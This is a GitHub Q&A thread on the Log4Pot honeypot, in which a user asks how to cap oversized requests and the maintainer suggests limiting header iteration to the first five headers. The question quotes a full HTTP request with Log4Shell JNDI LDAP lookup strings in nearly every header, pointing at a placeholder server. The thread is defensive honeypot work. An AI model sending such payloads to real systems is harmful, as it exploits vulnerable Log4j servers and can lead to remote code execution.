### DISCUSSION TITLE
is there a way to truncate incoming payload

### DISCUSSION THREAD

**Discussion by bob3rocks** [thomaspatzke/Log4Pot#20] [Q&A] [answered]
When running log4pot-server.py and testing the server with large malicious payloads, I am seeing a processor race condition happen while the honeypot tries to reach target DNS servers.

I have an authoritative DNS server running and I do see hundreds of requests coming in from the honeypot.

I can mitigate this somewhat by changing download-timeout from 15 to 1 second (I think that's the lowest available)

But, when sending large payloads to the honeypot, every request is a CPU hit and large payloads result in big CPU hits.

Here's a sample payload that generates a ton of requests and results in a CPU hit --

GET / HTTP/1.1
Host: ${jndi:ldap://my.server.ip.address:53}:8080
Cookie: ${jndi:ldap://my.server.ip.address:53}=${jndi:ldap://my.server.ip.address:53}; JSESSIONID=${jndi:ldap://my.server.ip.address:53}; SESSIONID=${jndi:ldap://my.server.ip.address:53}; PHPSESSID=${jndi:ldap://my.server.ip.address:53}; token=${jndi:ldap://my.server.ip.address:53}; session=${jndi:ldap://my.server.ip.address:53}
Accept-Charset: ${jndi:ldap://my.server.ip.address:53}
Access-Control-Request-Method: ${jndi:ldap://my.server.ip.address:53}
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: ${jndi:ldap://my.server.ip.address:53}
IP: ${jndi:ldap://my.server.ip.address:53}
Accept-Language: ${jndi:ldap://my.server.ip.address:53}
Cache-Control: ${jndi:ldap://my.server.ip.address:53}
Dnt: ${jndi:ldap://my.server.ip.address:53}
Content-Length: ${jndi:ldap://my.server.ip.address:53}
Date: ${jndi:ldap://my.server.ip.address:53}
From: ${jndi:ldap://my.server.ip.address:53}
Front-End-Https: ${jndi:ldap://my.server.ip.address:53}
HTTP2-Settings: ${jndi:ldap://my.server.ip.address:53}
If-Range: ${jndi:ldap://my.server.ip.address:53}
Content-Type: ${jndi:ldap://my.server.ip.address:53}
Hostname: ${jndi:ldap://my.server.ip.address:53}
Prefer: ${jndi:ldap://my.server.ip.address:53}
TE: ${jndi:ldap://my.server.ip.address:53}
Accept: ${jndi:ldap://my.server.ip.address:53}
Transfer-Encoding: ${jndi:ldap://my.server.ip.address:53}
Content-Disposition: ${jndi:ldap://my.server.ip.address:53}
Proxy-Authorization: ${jndi:ldap://my.server.ip.address:53}
Accept-Datetime: ${jndi:ldap://my.server.ip.address:53}
Access-Control-Request-Headers: ${jndi:ldap://my.server.ip.address:53}
Expect: ${jndi:ldap://my.server.ip.address:53}
Referer: ${jndi:ldap://my.server.ip.address:53}
Range: ${jndi:ldap://my.server.ip.address:53}
Content-MD5: ${jndi:ldap://my.server.ip.address:53}
Max-Forwards: ${jndi:ldap://my.server.ip.address:53}
Forwarded: ${jndi:ldap://my.server.ip.address:53}
If-None-Match: ${jndi:ldap://my.server.ip.address:53}
Trailer: ${jndi:ldap://my.server.ip.address:53}
Origin: ${jndi:ldap://my.server.ip.address:53}
If-Match: ${jndi:ldap://my.server.ip.address:53}
If-Unmodified-Since: ${jndi:ldap://my.server.ip.address:53}
If-Modified-Since: ${jndi:ldap://my.server.ip.address:53}
Content-Encoding: ${jndi:ldap://my.server.ip.address:53}
Authorization: ${jndi:ldap://my.server.ip.address:53}
Accept-Encoding: ${jndi:ldap://my.server.ip.address:53}
IPaddress: ${jndi:ldap://my.server.ip.address:53}
A-IM: ${jndi:ldap://my.server.ip.address:53}

I am wondering if there is an easy way to truncate the incoming request at a hard cap of say, 1000 characters, or otherwise sanitize input to limit the number of subsequent outgoing requests and prevent a CPU race condition.

**Comment by thomaspatzke** [comment, marked as answer]
Ok, the code was not really designed to be resistant against denial of service 😁

To answer your question: the loop that iterates over the headers is located [here](https://github.com/thomaspatzke/Log4Pot/blob/e224c0f786efb68b4aab892e69857e379b75b0c6/log4pot-server.py#L92). You could convert the iterator to a list and slice it by changing `self.headers.items()` to `list(self.headers.items())[:5]` which would limit it to five headers.

**Reply by bob3rocks** [reply]
Hello and thanks for the reply!

It was never my intention to DoS myself 🤣 

If someone is fuzzing my honeypot, they might stumble across a payload that results in a DoS condition, like I did when testing my normal payloads.

I will give this a shot! thanks again
